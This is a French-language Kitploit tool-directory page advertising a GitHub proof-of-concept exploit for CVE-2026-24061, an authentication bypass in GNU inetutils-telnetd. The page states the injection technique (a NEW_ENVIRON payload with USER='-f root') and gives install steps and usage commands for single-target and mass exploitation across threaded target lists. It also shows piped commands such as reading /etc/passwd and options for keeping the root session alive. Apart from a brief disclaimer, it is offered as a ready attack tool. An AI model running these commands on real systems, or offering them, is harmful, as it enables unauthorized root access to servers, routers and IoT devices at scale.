Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061-PoC-Exploit — Exploit de contournement d'authentification à distance pour GNU inetutils-telnetd (CVE-2026-24061) utilisant une injection CRLF pour obtenir un shell root instantané. Prend en charge l'exploitation unique/massive, le multi-threading, les ports personnalisés, le mode pipe et le maintien de session. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-24061-poc-exploit
Analyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubtc4dy/cve-2026-24061-poc-exploit

CVE-2026-24061-PoC-Exploit

Voir le dépôt
64il y a 4 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit de contournement d'authentification à distance pour GNU inetutils-telnetd (CVE-2026-24061) utilisant une injection CRLF pour obtenir un shell root instantané. Prend en charge l'exploitation unique/massive, le multi-threading, les ports personnalisés, le mode pipe et le maintien de session.

Partager

CVE-2026-24061

🚀 CVE-2026-24061 - Exploit de contournement d'authentification GNU inetutils-telnetd

Python Bash License CVSS

Édition GNU inetutils-telnetd - Injection CRLF pour contournement d'authentification et shell root instantané

📌 Aperçu

Cet exploit exploite CVE-2026-24061, une vulnérabilité critique de contournement d'authentification à distance dans GNU inetutils-telnetd. En injectant une charge utile NEW_ENVIRON spécialement conçue avec USER='-f root', il contourne l'authentification et accorde un shell root instantané sans aucune information d'identification.

Remarque: Le script basic_exploit.sh est une version simplifiée et plus rapide de exploit.sh ; cependant, exploit.sh est recommandé pour une fonctionnalité complète.

🔥 Fonctionnalités clés

CatégorieFonctionnalités
Exploitation✅ Contournement d'authentification via injection CRLF
✅ Shell root instantané
✅ Injection utilisateur personnalisée (-f admin, -f user)
Scanification✅ Exploitation cible unique
✅ Exploitation de masse depuis un fichier
✅ Multithreading (threads configurables)
✅ Prise en charge de ports personnalisés
Avancé✅ Mode Pipe (exécution de commandes via stdin)
✅ Maintien de session
✅ Mécanisme de tentative
✅ Contrôle du délai d'attente
Utilisabilité✅ Sortie colorée (colorama)
✅ Double langage (Python et Bash)
✅ Mode verbeux/débogage

🎯 Versions vulnérables

ProduitVersions
GNU inetutils-telnetd1.9.3 - 2.7
Distributions Linux concernéesDebian, CentOS, Ubuntu et leurs distributions. (Zorin OS, Linux Mint, Pop!_OS et Elementary OS)
Appareils embarquésNAS, IoT, routeurs

⚠️ Avertissement: Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'accès non autorisé est illégal.

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit

# Python version
pip3 install -r requirements.txt

# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh

🛠️ Exemples d'utilisation

🎯 Exploitation d'une cible unique

root@kitploit:~
# Python version
python3 exploit.py -u 192.168.1.100

# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100

🔧 Port et utilisateur personnalisés

root@kitploit:~
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323

# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin

📊 Exploitation de masse (multi-cibles)

root@kitploit:~
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20

# Bash version
./exploit.sh -l targets.txt -m 20

📡 Mode Pipe (exécution de commandes)

root@kitploit:~
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100

# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100

⚙️ Options avancées

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v

# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5

# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive

📊 Arguments de ligne de commande

CourtLongDescriptionPar défaut
-u--urlAdresse IP cibleRequis
-p--portPort cible23
-l--listFichier contenant la liste des ciblesAucun
-m--max-threadsNombre maximum de threads pour l'exploitation de masse10
-usr--usernameNom d'utilisateur à injecterroot
-t--timeoutDélai d'attente de la socket (secondes)10
-r--retriesNombre de tentatives3
-v--verboseActiver la sortie de débogageFalse
--keep-aliveMaintenir la session active après l'exploitationFalse

🔗 Exploits connexes

Découvrez mes autres dépôts d'exploits :

  • CVE-2026-41940
  • CVE-2026-0073
  • CVE-2026-29000
Télécharger l’outil